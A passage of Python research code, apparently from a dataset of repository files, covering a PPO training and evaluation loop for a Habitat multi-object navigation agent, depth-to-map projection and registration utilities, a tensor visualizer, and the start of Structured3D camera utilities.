goal_sensor_uuid=self.config.TASK_CONFIG.TASK.GOAL_SENSOR_UUID,
device=self.device,
object_category_embedding_size=self.config.RL.OBJECT_CATEGORY_EMBEDDING_SIZE,
previous_action_embedding_size=self.config.RL.PREVIOUS_ACTION_EMBEDDING_SIZE,
use_previous_action=self.config.RL.PREVIOUS_ACTION
)
self.actor_critic.to(self.device)
self.agent = PPOOracle(
actor_critic=self.actor_critic,
clip_param=ppo_cfg.clip_param,
ppo_epoch=ppo_cfg.ppo_epoch,
num_mini_batch=ppo_cfg.num_mini_batch,
value_loss_coef=ppo_cfg.value_loss_coef,
entropy_coef=ppo_cfg.entropy_coef,
lr=ppo_cfg.lr,
eps=ppo_cfg.eps,
max_grad_norm=ppo_cfg.max_grad_norm,
use_normalized_advantage=ppo_cfg.use_normalized_advantage,
)
def save_checkpoint(
self, file_name: str, extra_state: Optional[Dict] = None
) -> None:
r"""Save checkpoint with specified name.
Args:
file_name: file name for checkpoint
Returns:
None
"""
checkpoint = {
"state_dict": self.agent.state_dict(),
"config": self.config,
}
if extra_state is not None:
checkpoint["extra_state"] = extra_state
torch.save(
checkpoint, os.path.join(self.config.CHECKPOINT_FOLDER, file_name)
)
def load_checkpoint(self, checkpoint_path: str, *args, **kwargs) -> Dict:
r"""Load checkpoint of specified path as a dict.
Args:
checkpoint_path: path of target checkpoint
*args: additional positional args
**kwargs: additional keyword args
Returns:
dict containing checkpoint info
"""
return torch.load(checkpoint_path, *args, **kwargs)
METRICS_BLACKLIST = {"top_down_map", "collisions.is_collision", "raw_metrics", "traj_metrics"}
@classmethod
def _extract_scalars_from_info(
cls, info: Dict[str, Any]
) -> Dict[str, float]:
result = {}
for k, v in info.items():
if k in cls.METRICS_BLACKLIST:
continue
if isinstance(v, dict):
result.update(
{
k + "." + subk: subv
for subk, subv in cls._extract_scalars_from_info(
v
).items()
if (k + "." + subk) not in cls.METRICS_BLACKLIST
}
)
# Things that are scalar-like will have an np.size of 1.
# Strings also have an np.size of 1, so explicitly ban those
elif np.size(v) == 1 and not isinstance(v, str):
result[k] = float(v)
return result
@classmethod
def _extract_scalars_from_infos(
cls, infos: List[Dict[str, Any]]
) -> Dict[str, List[float]]:
results = defaultdict(list)
for i in range(len(infos)):
for k, v in cls._extract_scalars_from_info(infos[i]).items():
results[k].append(v)
return results
def _collect_rollout_step(
self, rollouts, current_episode_reward, running_episode_stats
):
pth_time = 0.0
env_time = 0.0
t_sample_action = time.time()
# sample actions
with torch.no_grad():
step_observation = {
k: v[rollouts.step] for k, v in rollouts.observations.items()
}
(
values,
actions,
actions_log_probs,
recurrent_hidden_states,
) = self.actor_critic.act(
step_observation,
rollouts.recurrent_hidden_states[rollouts.step],
rollouts.prev_actions[rollouts.step],
rollouts.masks[rollouts.step],
)
pth_time += time.time() - t_sample_action
t_step_env = time.time()
outputs = self.envs.step([a[0].item() for a in actions])
observations, rewards, dones, infos = [list(x) for x in zip(*outputs)]
env_time += time.time() - t_step_env
t_update_stats = time.time()
batch = batch_obs(observations, device=self.device)
rewards = torch.tensor(
rewards, dtype=torch.float, device=current_episode_reward.device
)
rewards = rewards.unsqueeze(1)
masks = torch.tensor(
[[0.0] if done else [1.0] for done in dones],
dtype=torch.float,
device=current_episode_reward.device,
)
current_episode_reward += rewards
running_episode_stats["reward"] += (1 - masks) * current_episode_reward
running_episode_stats["count"] += 1 - masks
for k, v in self._extract_scalars_from_infos(infos).items():
v = torch.tensor(
v, dtype=torch.float, device=current_episode_reward.device
).unsqueeze(1)
if k not in running_episode_stats:
running_episode_stats[k] = torch.zeros_like(
running_episode_stats["count"]
)
running_episode_stats[k] += (1 - masks) * v
current_episode_reward *= masks
if self._static_encoder:
with torch.no_grad():
batch["visual_features"] = self._encoder(batch)
rollouts.insert(
batch,
recurrent_hidden_states,
actions,
actions_log_probs,
values,
rewards,
masks,
)
pth_time += time.time() - t_update_stats
return pth_time, env_time, self.envs.num_envs
def _update_agent(self, ppo_cfg, rollouts):
t_update_model = time.time()
with torch.no_grad():
last_observation = {
k: v[rollouts.step] for k, v in rollouts.observations.items()
}
next_value = self.actor_critic.get_value(
last_observation,
rollouts.recurrent_hidden_states[rollouts.step],
rollouts.prev_actions[rollouts.step],
rollouts.masks[rollouts.step],
).detach()
rollouts.compute_returns(
next_value, ppo_cfg.use_gae, ppo_cfg.gamma, ppo_cfg.tau
)
value_loss, action_loss, dist_entropy = self.agent.update(rollouts)
rollouts.after_update()
return (
time.time() - t_update_model,
value_loss,
action_loss,
dist_entropy,
)
def train(self) -> None:
r"""Main method for training PPO.
Returns:
None
"""
self.envs = construct_envs(
self.config, get_env_class(self.config.ENV_NAME)
)
ppo_cfg = self.config.RL.PPO
self.device = (
torch.device("cuda", self.config.TORCH_GPU_ID)
if torch.cuda.is_available()
else torch.device("cpu")
)
if not os.path.isdir(self.config.CHECKPOINT_FOLDER):
os.makedirs(self.config.CHECKPOINT_FOLDER)
self._setup_actor_critic_agent(ppo_cfg)
logger.info(
"agent number of parameters: {}".format(
sum(param.numel() for param in self.agent.parameters())
)
)
rollouts = RolloutStorageOracle(
ppo_cfg.num_steps,
self.envs.num_envs,
self.envs.observation_spaces[0],
self.envs.action_spaces[0],
ppo_cfg.hidden_size,
)
rollouts.to(self.device)
observations = self.envs.reset()
batch = batch_obs(observations, device=self.device)
for sensor in rollouts.observations:
rollouts.observations[sensor][0].copy_(batch[sensor])
# batch and observations may contain shared PyTorch CUDA
# tensors. We must explicitly clear them here otherwise
# they will be kept in memory for the entire duration of training!
batch = None
observations = None
current_episode_reward = torch.zeros(self.envs.num_envs, 1)
running_episode_stats = dict(
count=torch.zeros(self.envs.num_envs, 1),
reward=torch.zeros(self.envs.num_envs, 1),
)
window_episode_stats = defaultdict(
lambda: deque(maxlen=ppo_cfg.reward_window_size)
)
t_start = time.time()
env_time = 0
pth_time = 0
count_steps = 0
count_checkpoints = 0
lr_scheduler = LambdaLR(
optimizer=self.agent.optimizer,
lr_lambda=lambda x: linear_decay(x, self.config.NUM_UPDATES),
)
with TensorboardWriter(
self.config.TENSORBOARD_DIR, flush_secs=self.flush_secs
) as writer:
for update in range(self.config.NUM_UPDATES):
if ppo_cfg.use_linear_lr_decay:
lr_scheduler.step()
if ppo_cfg.use_linear_clip_decay:
self.agent.clip_param = ppo_cfg.clip_param * linear_decay(
update, self.config.NUM_UPDATES
)
for step in range(ppo_cfg.num_steps):
(
delta_pth_time,
delta_env_time,
delta_steps,
) = self._collect_rollout_step(
rollouts, current_episode_reward, running_episode_stats
)
pth_time += delta_pth_time
env_time += delta_env_time
count_steps += delta_steps
(
delta_pth_time,
value_loss,
action_loss,
dist_entropy,
) = self._update_agent(ppo_cfg, rollouts)
pth_time += delta_pth_time
for k, v in running_episode_stats.items():
window_episode_stats[k].append(v.clone())
deltas = {
k: (
(v[-1] - v[0]).sum().item()
if len(v) > 1
else v[0].sum().item()
)
for k, v in window_episode_stats.items()
}
deltas["count"] = max(deltas["count"], 1.0)
writer.add_scalar(
"train/reward", deltas["reward"] / deltas["count"], count_steps
)
writer.add_scalar(
"train/learning_rate", lr_scheduler._last_lr[0], count_steps
)
total_actions = rollouts.actions.shape[0] * rollouts.actions.shape[1]
total_found_actions = int(torch.sum(rollouts.actions == 0).cpu().numpy())
total_forward_actions = int(torch.sum(rollouts.actions == 1).cpu().numpy())
total_left_actions = int(torch.sum(rollouts.actions == 2).cpu().numpy())
total_right_actions = int(torch.sum(rollouts.actions == 3).cpu().numpy())
total_look_up_actions = int(torch.sum(rollouts.actions == 4).cpu().numpy())
total_look_down_actions = int(torch.sum(rollouts.actions == 5).cpu().numpy())
assert total_actions == (total_found_actions + total_forward_actions +
total_left_actions + total_right_actions + total_look_up_actions +
total_look_down_actions
)
writer.add_scalar(
"train/found_action_prob", total_found_actions/total_actions, count_steps
)
writer.add_scalar(
"train/forward_action_prob", total_forward_actions/total_actions, count_steps
)
writer.add_scalar(
"train/left_action_prob", total_left_actions/total_actions, count_steps
)
writer.add_scalar(
"train/right_action_prob", total_right_actions/total_actions, count_steps
)
writer.add_scalar(
"train/look_up_action_prob", total_look_up_actions/total_actions, count_steps
)
writer.add_scalar(
"train/look_down_action_prob", total_look_down_actions/total_actions, count_steps
)
metrics = {
k: v / deltas["count"]
for k, v in deltas.items()
if k not in {"reward", "count"}
}
if len(metrics) > 0:
writer.add_scalar("metrics/distance_to_currgoal", metrics["distance_to_currgoal"], count_steps)
writer.add_scalar("metrics/success", metrics["success"], count_steps)
writer.add_scalar("metrics/sub_success", metrics["sub_success"], count_steps)
writer.add_scalar("metrics/episode_length", metrics["episode_length"], count_steps)
writer.add_scalar("metrics/distance_to_multi_goal", metrics["distance_to_multi_goal"], count_steps)
writer.add_scalar("metrics/percentage_success", metrics["percentage_success"], count_steps)
writer.add_scalar("train/losses_value", value_loss, count_steps)
writer.add_scalar("train/losses_policy", action_loss, count_steps)
# log stats
if update > 0 and update % self.config.LOG_INTERVAL == 0:
logger.info(
"update: {}\tfps: {:.3f}\t".format(
update, count_steps / (time.time() - t_start)
)
)
logger.info(
"update: {}\tenv-time: {:.3f}s\tpth-time: {:.3f}s\t"
"frames: {}".format(
update, env_time, pth_time, count_steps
)
)
logger.info(
"Average window size: {} {}".format(
len(window_episode_stats["count"]),
" ".join(
"{}: {:.3f}".format(k, v / deltas["count"])
for k, v in deltas.items()
if k != "count"
),
)
)
# checkpoint model
if update % self.config.CHECKPOINT_INTERVAL == 0:
self.save_checkpoint(
f"ckpt.{count_checkpoints}.pth", dict(step=count_steps)
)
count_checkpoints += 1
self.envs.close()
def _eval_checkpoint(
self,
checkpoint_path: str,
writer: TensorboardWriter,
checkpoint_index: int = 0,
) -> None:
r"""Evaluates a single checkpoint.
Args:
checkpoint_path: path of checkpoint
writer: tensorboard writer object for logging to tensorboard
checkpoint_index: index of cur checkpoint for logging
Returns:
None
"""
# Map location CPU is almost always better than mapping to a CUDA device.
ckpt_dict = self.load_checkpoint(checkpoint_path, map_location="cpu")
if self.config.EVAL.USE_CKPT_CONFIG:
config = self._setup_eval_config(ckpt_dict["config"])
else:
config = self.config.clone()
ppo_cfg = config.RL.PPO
config.defrost()
config.TASK_CONFIG.DATASET.SPLIT = config.EVAL.SPLIT
config.freeze()
if len(self.config.VIDEO_OPTION) > 0:
config.defrost()
config.TASK_CONFIG.TASK.MEASUREMENTS.append("TOP_DOWN_MAP")
config.TASK_CONFIG.TASK.MEASUREMENTS.append("COLLISIONS")
config.freeze()
logger.info(f"env config: {config}")
self.envs = construct_envs(config, get_env_class(config.ENV_NAME))
self._setup_actor_critic_agent(ppo_cfg)
self.agent.load_state_dict(ckpt_dict["state_dict"])
self.actor_critic = self.agent.actor_critic
observations = self.envs.reset()
batch = batch_obs(observations, device=self.device)
current_episode_reward = torch.zeros(
self.envs.num_envs, 1, device=self.device
)
test_recurrent_hidden_states = torch.zeros(
self.actor_critic.net.num_recurrent_layers,
self.config.NUM_PROCESSES,
ppo_cfg.hidden_size,
device=self.device,
)
prev_actions = torch.zeros(
self.config.NUM_PROCESSES, 1, device=self.device, dtype=torch.long
)
not_done_masks = torch.zeros(
self.config.NUM_PROCESSES, 1, device=self.device
)
stats_episodes = dict() # dict of dicts that stores stats per episode
raw_metrics_episodes = dict()
traj_metrics_episodes = dict()
rgb_frames = [
[] for _ in range(self.config.NUM_PROCESSES)
] # type: List[List[np.ndarray]]
if len(self.config.VIDEO_OPTION) > 0:
os.makedirs(self.config.VIDEO_DIR, exist_ok=True)
pbar = tqdm.tqdm(total=self.config.TEST_EPISODE_COUNT)
self.actor_critic.eval()
while (
len(stats_episodes) < self.config.TEST_EPISODE_COUNT
and self.envs.num_envs > 0
):
current_episodes = self.envs.current_episodes()
with torch.no_grad():
(
_,
actions,
_,
test_recurrent_hidden_states,
) = self.actor_critic.act(
batch,
test_recurrent_hidden_states,
prev_actions,
not_done_masks,
deterministic=False,
)
prev_actions.copy_(actions)
outputs = self.envs.step([a[0].item() for a in actions])
observations, rewards, dones, infos = [
list(x) for x in zip(*outputs)
]
batch = batch_obs(observations, device=self.device)
not_done_masks = torch.tensor(
[[0.0] if done else [1.0] for done in dones],
dtype=torch.float,
device=self.device,
)
rewards = torch.tensor(
rewards, dtype=torch.float, device=self.device
).unsqueeze(1)
current_episode_reward += rewards
next_episodes = self.envs.current_episodes()
envs_to_pause = []
n_envs = self.envs.num_envs
for i in range(n_envs):
if (
next_episodes[i].scene_id,
next_episodes[i].episode_id,
) in stats_episodes:
envs_to_pause.append(i)
# episode ended
if not_done_masks[i].item() == 0:
pbar.update()
episode_stats = dict()
episode_stats["reward"] = current_episode_reward[i].item()
episode_stats.update(
self._extract_scalars_from_info(infos[i])
)
current_episode_reward[i] = 0
# use scene_id + episode_id as unique id for storing stats
stats_episodes[
(
current_episodes[i].scene_id,
current_episodes[i].episode_id,
)
] = episode_stats
"""
raw_metrics_episodes[
current_episodes[i].scene_id + '.' +
current_episodes[i].episode_id
] = infos[i]["raw_metrics"]
"""
# traj_metrics_episodes[
# current_episodes[i].scene_id + '.' +
# current_episodes[i].episode_id
# ] = infos[i]["traj_metrics"]
if len(self.config.VIDEO_OPTION) > 0:
generate_video(
video_option=self.config.VIDEO_OPTION,
video_dir=self.config.VIDEO_DIR,
images=rgb_frames[i],
episode_id=current_episodes[i].episode_id,
checkpoint_idx=checkpoint_index,
metrics=self._extract_scalars_from_info(infos[i]),
tb_writer=writer,
)
# cv2.imwrite(config.VIDEO_DIR + '/' + current_episodes[i].episode_id + '.jpg', rgb_frames[i][-1])
rgb_frames[i] = []
# episode continues
elif len(self.config.VIDEO_OPTION) > 0:
frame = observations_to_image(observations[i], infos[i], actions[i].cpu().numpy())
rgb_frames[i].append(frame)
(
self.envs,
test_recurrent_hidden_states,
not_done_masks,
current_episode_reward,
prev_actions,
batch,
rgb_frames,
) = self._pause_envs(
envs_to_pause,
self.envs,
test_recurrent_hidden_states,
not_done_masks,
current_episode_reward,
prev_actions,
batch,
rgb_frames,
)
num_episodes = len(stats_episodes)
aggregated_stats = dict()
for stat_key in next(iter(stats_episodes.values())).keys():
aggregated_stats[stat_key] = (
sum([v[stat_key] for v in stats_episodes.values()])
/ num_episodes
)
for k, v in aggregated_stats.items():
logger.info(f"Average episode {k}: {v:.4f}")
step_id = checkpoint_index
if "extra_state" in ckpt_dict and "step" in ckpt_dict["extra_state"]:
step_id = ckpt_dict["extra_state"]["step"]
writer.add_scalar("eval/average_reward", aggregated_stats["reward"],
step_id,
)
metrics = {k: v for k, v in aggregated_stats.items() if k != "reward"}
writer.add_scalar("eval/distance_to_currgoal", metrics["distance_to_currgoal"], step_id)
writer.add_scalar("eval/distance_to_multi_goal", metrics["distance_to_multi_goal"], step_id)
writer.add_scalar("eval/episode_length", metrics["episode_length"], step_id)
writer.add_scalar("eval/mspl", metrics["mspl"], step_id)
writer.add_scalar("eval/pspl", metrics["pspl"], step_id)
writer.add_scalar("eval/percentage_success", metrics["percentage_success"], step_id)
writer.add_scalar("eval/success", metrics["success"], step_id)
writer.add_scalar("eval/sub_success", metrics["sub_success"], step_id)
writer.add_scalar("eval/pspl", metrics["pspl"], step_id)
##Dump metrics JSON
if 'RAW_METRICS' in config.TASK_CONFIG.TASK.MEASUREMENTS:
if not os.path.exists(config.TENSORBOARD_DIR_EVAL +'/metrics'):
os.mkdir(config.TENSORBOARD_DIR_EVAL +'/metrics')
with open(config.TENSORBOARD_DIR_EVAL + '/metrics/' + checkpoint_path.split('/')[-1] + '.json', 'w') as fp:
json.dump(raw_metrics_episodes, fp)
# if not os.path.exists(config.TENSORBOARD_DIR_EVAL +'/traj_metrics'):
# os.mkdir(config.TENSORBOARD_DIR_EVAL +'/traj_metrics')
# with open(config.TENSORBOARD_DIR_EVAL +'/traj_metrics/' + checkpoint_path.split('/')[-1] + '.json', 'w') as fp:
# json.dump(traj_metrics_episodes, fp)
self.envs.close()
```
#### File: SGoLAM/utils/geometry.py
```python
from einops import rearrange
import numpy as np
import math
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch_scatter
"""
Code adapted from https://github.com/saimwani/multiON
"""
def get_grid(pose, grid_size, device):
"""
Input:
`pose` FloatTensor(bs, 3)
`grid_size` 4-tuple (bs, _, grid_h, grid_w)
`device` torch.device (cpu or gpu)
Output:
`rot_grid` FloatTensor(bs, grid_h, grid_w, 2)
`trans_grid` FloatTensor(bs, grid_h, grid_w, 2)
"""
pose = pose.float()
x = pose[:, 0]
y = pose[:, 1]
t = pose[:, 2]
bs = x.size(0)
cos_t = t.cos()
sin_t = t.sin()
theta11 = torch.stack([cos_t, -sin_t,
torch.zeros(cos_t.shape).float().to(device)], 1)
theta12 = torch.stack([sin_t, cos_t,
torch.zeros(cos_t.shape).float().to(device)], 1)
theta1 = torch.stack([theta11, theta12], 1)
theta21 = torch.stack([torch.ones(x.shape).to(device),
-torch.zeros(x.shape).to(device), x], 1)
theta22 = torch.stack([torch.zeros(x.shape).to(device),
torch.ones(x.shape).to(device), y], 1)
theta2 = torch.stack([theta21, theta22], 1)
rot_grid = F.affine_grid(theta1, torch.Size(grid_size))
trans_grid = F.affine_grid(theta2, torch.Size(grid_size))
return rot_grid, trans_grid
class to_grid():
def __init__(self, global_map_size, coordinate_min, coordinate_max):
self.global_map_size = global_map_size
self.coordinate_min = coordinate_min
self.coordinate_max = coordinate_max
self.grid_size = (coordinate_max - coordinate_min) / global_map_size
def get_grid_coords(self, positions):
grid_x = ((self.coordinate_max - positions[:, 0]) / self.grid_size).floor()
grid_y = ((positions[:, 1] - self.coordinate_min) / self.grid_size).floor()
return grid_x, grid_y
def get_gps_coords(self, idx):
# H, W indices to gps coordinates
grid_x = idx[0].item()
grid_y = idx[1].item()
gps_x = self.coordinate_max - grid_x * self.grid_size
gps_y = self.coordinate_min + grid_y * self.grid_size
return gps_x, gps_y
class ComputeSpatialLocs():
def __init__(self, egocentric_map_size, global_map_size,
device, coordinate_min, coordinate_max, height_min, height_max
):
# Note: The side of one grid in egocentric map and global map is the same
self.device = device
self.cx, self.cy = 256./2., 256./2. # Hard coded camera parameters
self.fx = self.fy = (256. / 2.) / np.tan(np.deg2rad(79 / 2.))
self.egocentric_map_size = egocentric_map_size
self.local_scale = float(coordinate_max - coordinate_min)/float(global_map_size)
self.height_min, self.height_max = height_min, height_max # Minimum, maximum height values to cut off for mapping
def compute_y(self, depth):
# Returns a y-value image with the same shape as depth
depth = depth.permute(0, 3, 1, 2)
_, _, imh, imw = depth.shape # batchsize, 1, imh, imw
y = rearrange(torch.arange(imh, 0, step=-1), 'h -> () () h ()').to(self.device)
yy = (y - self.cy) / self.fy
Z = depth
Y = yy * Z
Y = Y.permute(0, 2, 3, 1)
return Y[0].expand(Y.shape[1], Y.shape[2], 3)
def draw_range(self, depth, tgt_img, height_min, height_max):
# Returns a image with the height ranges in [height_min, height_max] marked in red
tgt_img = tgt_img.clone().detach()
depth = depth.permute(0, 3, 1, 2)
_, _, imh, imw = depth.shape # batchsize, 1, imh, imw
y = rearrange(torch.arange(imh, 0, step=-1), 'h -> () () h ()').to(self.device)
yy = (y - self.cy) / self.fy
Z = depth
Y = yy * Z
Y = Y.permute(0, 2, 3, 1)
_, idx_h, idx_w, _ = torch.where((Y < height_max) & (Y > height_min))
tgt_img[0, idx_h, idx_w, :] = torch.ByteTensor([[255, 0, 0]]).to(self.device)
return tgt_img[0]
def forward(self, depth):
depth = depth.permute(0, 3, 1, 2)
_, _, imh, imw = depth.shape # batchsize, 1, imh, imw
x = rearrange(torch.arange(0, imw), 'w -> () () () w').to(self.device)
y = rearrange(torch.arange(imh, 0, step=-1), 'h -> () () h ()').to(self.device)
xx = (x - self.cx) / self.fx
yy = (y - self.cy) / self.fy
# 3D real-world coordinates (in meters)
Z = depth
X = xx * Z
Y = yy * Z
# Valid inputs (depth sensor's max depth is 10m)
valid_inputs = (depth != 0) & ((Y > self.height_min) & (Y < self.height_max)) & (depth < 10.0)
# X ground projection and Y ground projection
x_gp = ( (X / self.local_scale) + (self.egocentric_map_size-1)/2).round().long() # (bs, imh, imw, 1)
y_gp = (-(Z / self.local_scale) + (self.egocentric_map_size-1)/2).round().long() # (bs, imh, imw, 1)
return torch.cat([x_gp, y_gp], dim=1), valid_inputs
class ProjectToGroundPlane():
def __init__(self, egocentric_map_size, device, scatter_mode):
self.egocentric_map_size = egocentric_map_size
self.device = device
self.scatter_mode = scatter_mode
def forward(self, img, spatial_locs, valid_inputs):
outh, outw = (self.egocentric_map_size, self.egocentric_map_size)
bs, f, HbyK, WbyK = img.shape
K = 1
# Sub-sample spatial_locs, valid_inputs according to img_feats resolution.
idxes_ss = ((torch.arange(0, HbyK, 1)*K).long().to(self.device), \
(torch.arange(0, WbyK, 1)*K).long().to(self.device))
spatial_locs_ss = spatial_locs[:, :, idxes_ss[0][:, None], idxes_ss[1]] # (bs, 2, HbyK, WbyK)
valid_inputs_ss = valid_inputs[:, :, idxes_ss[0][:, None], idxes_ss[1]] # (bs, 1, HbyK, WbyK)
valid_inputs_ss = valid_inputs_ss.squeeze(1) # (bs, HbyK, WbyK)
invalid_inputs_ss = ~valid_inputs_ss
# Filter out invalid spatial locations
invalid_spatial_locs = (spatial_locs_ss[:, 1] >= outh) | (spatial_locs_ss[:, 1] < 0 ) | \
(spatial_locs_ss[:, 0] >= outw) | (spatial_locs_ss[:, 0] < 0 ) # (bs, H, W)
invalid_writes = invalid_spatial_locs | invalid_inputs_ss
# Set the idxes for all invalid locations to (0, 0)
spatial_locs_ss[:, 0][invalid_writes] = 0
spatial_locs_ss[:, 1][invalid_writes] = 0
# Linearize ground-plane indices (linear idx = y * W + x)
linear_locs_ss = spatial_locs_ss[:, 1] * outw + spatial_locs_ss[:, 0] # (bs, H, W)
linear_locs_ss = rearrange(linear_locs_ss, 'b h w -> b () (h w)')
linear_locs_ss = linear_locs_ss.expand(-1, f, -1) # .contiguous()
linear_locs_ss = linear_locs_ss[..., ~invalid_writes.reshape(-1)]
tgt_img = img.reshape(1, f, -1)[..., ~invalid_writes.reshape(-1)]
if self.scatter_mode == 'max':
proj_feats, _ = torch_scatter.scatter_max(
tgt_img,
linear_locs_ss,
dim=2,
dim_size=outh*outw,
)
elif self.scatter_mode == 'min':
proj_feats, _ = torch_scatter.scatter_min(
tgt_img,
linear_locs_ss,
dim=2,
dim_size=outh*outw,
)
elif self.scatter_mode == 'mean':
proj_feats = torch_scatter.scatter_mean(
tgt_img,
linear_locs_ss,
dim=2,
dim_size=outh*outw,
)
else:
raise ValueError("Invalid scatter mode!")
proj_feats = rearrange(proj_feats, 'b e (h w) -> b e h w', h=outh)
return proj_feats
class RotateTensor:
def __init__(self, device):
self.device = device
def forward(self, x_gp, heading):
sin_t = torch.sin(heading.squeeze(1))
cos_t = torch.cos(heading.squeeze(1))
A = torch.zeros(x_gp.size(0), 2, 3).to(self.device)
A[:, 0, 0] = cos_t
A[:, 0, 1] = sin_t
A[:, 1, 0] = -sin_t
A[:, 1, 1] = cos_t
grid = F.affine_grid(A, x_gp.size())
rotated_x_gp = F.grid_sample(x_gp, grid)
return rotated_x_gp
class Projection:
def __init__(self, egocentric_map_size, global_map_size, device, coordinate_min, coordinate_max, height_min, height_max, scatter_mode):
self.egocentric_map_size = egocentric_map_size
self.global_map_size = global_map_size
self.compute_spatial_locs = ComputeSpatialLocs(egocentric_map_size, global_map_size,
device, coordinate_min, coordinate_max, height_min, height_max
)
self.project_to_ground_plane = ProjectToGroundPlane(egocentric_map_size, device, scatter_mode)
self.rotate_tensor = RotateTensor(device)
def forward(self, img, depth, heading):
spatial_locs, valid_inputs = self.compute_spatial_locs.forward(depth)
x_gp = self.project_to_ground_plane.forward(img, spatial_locs, valid_inputs)
rotated_x_gp = self.rotate_tensor.forward(x_gp, heading)
return rotated_x_gp
class Registration:
def __init__(self, egocentric_map_size, global_map_size, global_map_depth, device, coordinate_min, coordinate_max, num_obs):
self.egocentric_map_size = egocentric_map_size
self.global_map_size = global_map_size
self.global_map_depth = global_map_depth
self.device = device
self.to_grid = to_grid(global_map_size, coordinate_min, coordinate_max)
self.num_obs = num_obs
def forward(self, observations, full_global_map, egocentric_map):
"""
Register egocentric_map to full_global_map
Args:
observations: Dictionary containing habitat observations
full_global_map: (self.num_obs, self.global_map_size, self.global_map_size, self.global_map_depth) torch.tensor containing global map
egocentric_map: (self.num_obs, self.egocentric_map_size, self.egocentric_map_size, self.global_map_depth) torch.tensor containing egocentrc map
Returns:
registered_map: (self.num_obs, self.global_map_size, self.global_map_size, self.global_map_depth) torch.tensor containing registered map
"""
grid_x, grid_y = self.to_grid.get_grid_coords(observations['gps'])
if torch.cuda.is_available():
with torch.cuda.device(self.device):
agent_view = torch.cuda.FloatTensor(self.num_obs, self.global_map_depth, self.global_map_size, self.global_map_size).fill_(0)
else:
agent_view = torch.FloatTensor(self.num_obs, self.global_map_depth, self.global_map_size, self.global_map_size).to(self.device).fill_(0)
agent_view[:, :,
self.global_map_size//2 - math.floor(self.egocentric_map_size/2):self.global_map_size//2 + math.ceil(self.egocentric_map_size/2),
self.global_map_size//2 - math.floor(self.egocentric_map_size/2):self.global_map_size//2 + math.ceil(self.egocentric_map_size/2)
] = egocentric_map
st_pose = torch.cat(
[-(grid_y.unsqueeze(1)-(self.global_map_size//2))/(self.global_map_size//2),
-(grid_x.unsqueeze(1)-(self.global_map_size//2))/(self.global_map_size//2),
observations['compass']],
dim=1
)
rot_mat, trans_mat = get_grid(st_pose, agent_view.size(), self.device)
rotated = F.grid_sample(agent_view, rot_mat)
translated = F.grid_sample(rotated, trans_mat)
registered_map = torch.max(full_global_map, translated.permute(0, 2, 3, 1))
return registered_map
class GlobalMap2World:
# TODO: Needs testing
# Class for converting global map indices to world coordinates
def __init__(self, orig_position, orig_rot, grid_mapper: to_grid):
self.device = orig_position.device
self.orig_position = orig_position # (3, ) torch tensor containing agent start position
self.orig_rot = orig_rot # (1, ) torch.tensor containing agent start rotation
self.rot_mat = torch.tensor([[math.cos(orig_rot), -math.sin(orig_rot)], [math.sin(orig_rot), math.cos(orig_rot)]], device=self.device)
self.grid_mapper = grid_mapper # Maps GPS coordinate to indices
def convert(self, global_map_idx):
# Global map to world position
gps_x, gps_y = self.grid_mapper.get_gps_coords(global_map_idx)
gps_tmp = self.rot_mat.T @ torch.tensor([[gps_x], [gps_y]])
return torch.tensor([gps_tmp[0], self.orig_position[1], gps_tmp[-1]])
def inv_convert(self, world_position):
# World position to global map index
import pdb; pdb.set_trace()
gps_world_position = (world_position - self.orig_position) # (2, ) torch tensor containing agent-centric position
gps_world_position = torch.tensor([[gps_world_position[0, 0]], [gps_world_position[0, 2]]], device=self.device)
gps_world_position = (self.rot_mat @ gps_world_position).T # (1, 2)
grid_x, grid_y = self.grid_mapper.get_grid_coords(gps_world_position)
return grid_x.long().item(), grid_y.long().item()
```
#### File: SGoLAM/utils/visualize.py
```python
import matplotlib.pyplot as plt
import numpy as np
def debug_visualize(tgt_tensor):
"""
Visualize target tensor. If batch dimension exists, visualizes the first instance. Multi-channel inputs are shown as 'slices'.
If number of channels is 3, displayed in RGB. Otherwise results are shown as single channel images.
For inputs that are float, we assume that the tgt_tensor values are normalized within [0, 1].
For inputs that are int, we assume that the tgt_tensor values are normalized within [0, 255].
Args:
tgt_tensor: torch.tensor with one of the following shapes: (H, W), (H, W, C), (B, H, W, C)
Returns:
None
"""
if "torch" in str(type(tgt_tensor)):
vis_tgt = tgt_tensor.cpu().float().numpy()
elif "numpy" in str(type(tgt_tensor)):
vis_tgt = tgt_tensor.astype(np.float)
else:
raise ValueError("Invalid input!")
if vis_tgt.max() > 2.0: # If tgt_tensor is in range greater than 2.0, we assume it is an RGB image
vis_tgt /= 255.
if len(vis_tgt.shape) == 2:
H, W = vis_tgt.shape
plt.imshow(vis_tgt, cmap='gray', vmin=vis_tgt.min(), vmax=vis_tgt.max())
plt.show()
elif len(vis_tgt.shape) == 3:
H, W, C = vis_tgt.shape
if C > 3 or C == 2:
fig = plt.figure(figsize=(50, 50))
for i in range(C):
fig.add_subplot(C // 2, 2, i + 1)
plt.imshow(vis_tgt[..., i], cmap='gray', vmin=vis_tgt[..., i].min(), vmax=vis_tgt[..., i].max())
elif C == 3: # Display as RGB
plt.imshow(vis_tgt)
elif C == 1:
plt.imshow(vis_tgt, cmap='gray', vmin=vis_tgt.min(), vmax=vis_tgt.max())
plt.show()
elif len(vis_tgt.shape) == 4:
B, H, W, C = vis_tgt.shape
vis_tgt = vis_tgt[0]
if C > 3 or C == 2:
fig = plt.figure(figsize=(50, 50))
for i in range(C):
fig.add_subplot(C // 2, 2, i + 1)
plt.imshow(vis_tgt[..., i], cmap='gray', vmin=vis_tgt[..., i].min(), vmax=vis_tgt[..., i].max())
elif C == 3: # Display as RGB
plt.imshow(vis_tgt)
elif C == 1:
plt.imshow(vis_tgt, cmap='gray', vmin=vis_tgt.min(), vmax=vis_tgt.max())
plt.show()
``` |
{
"source": "82magnolia/Structured3D",
"score": 2
} |
#### File: Structured3D/misc/utils.py
```python
import numpy as np
def normalize(vector):
return vector / np.linalg.norm(vector)
def parse_camera_info(camera_info, height, width):
""" extract intrinsic and extrinsic matrix
"""
lookat = normalize(camera_info[3:6])
up = normalize(camera_info[6:9])
W = lookat
U = np.cross(W, up)
V = -np.cross(W, U)
rot = np.vstack((U, V, W))
trans = camera_info[:3]
xfov = camera_info[9]
yfov = camera_info[10]
K = np.diag([1, 1, 1])
K[0, 2] = width / 2
K[1, 2] = height / 2
K[0, 0] = K[0, 2] / np.tan(xfov)
K[1, 1] = K[1, 2] / np.tan(yfov)
return rot, trans, K
def flip_towards_viewer(normals, points):
points = points / np.linalg.norm(points)
proj = points.dot(normals[:2, :].T)
flip = np.where(proj > 0)
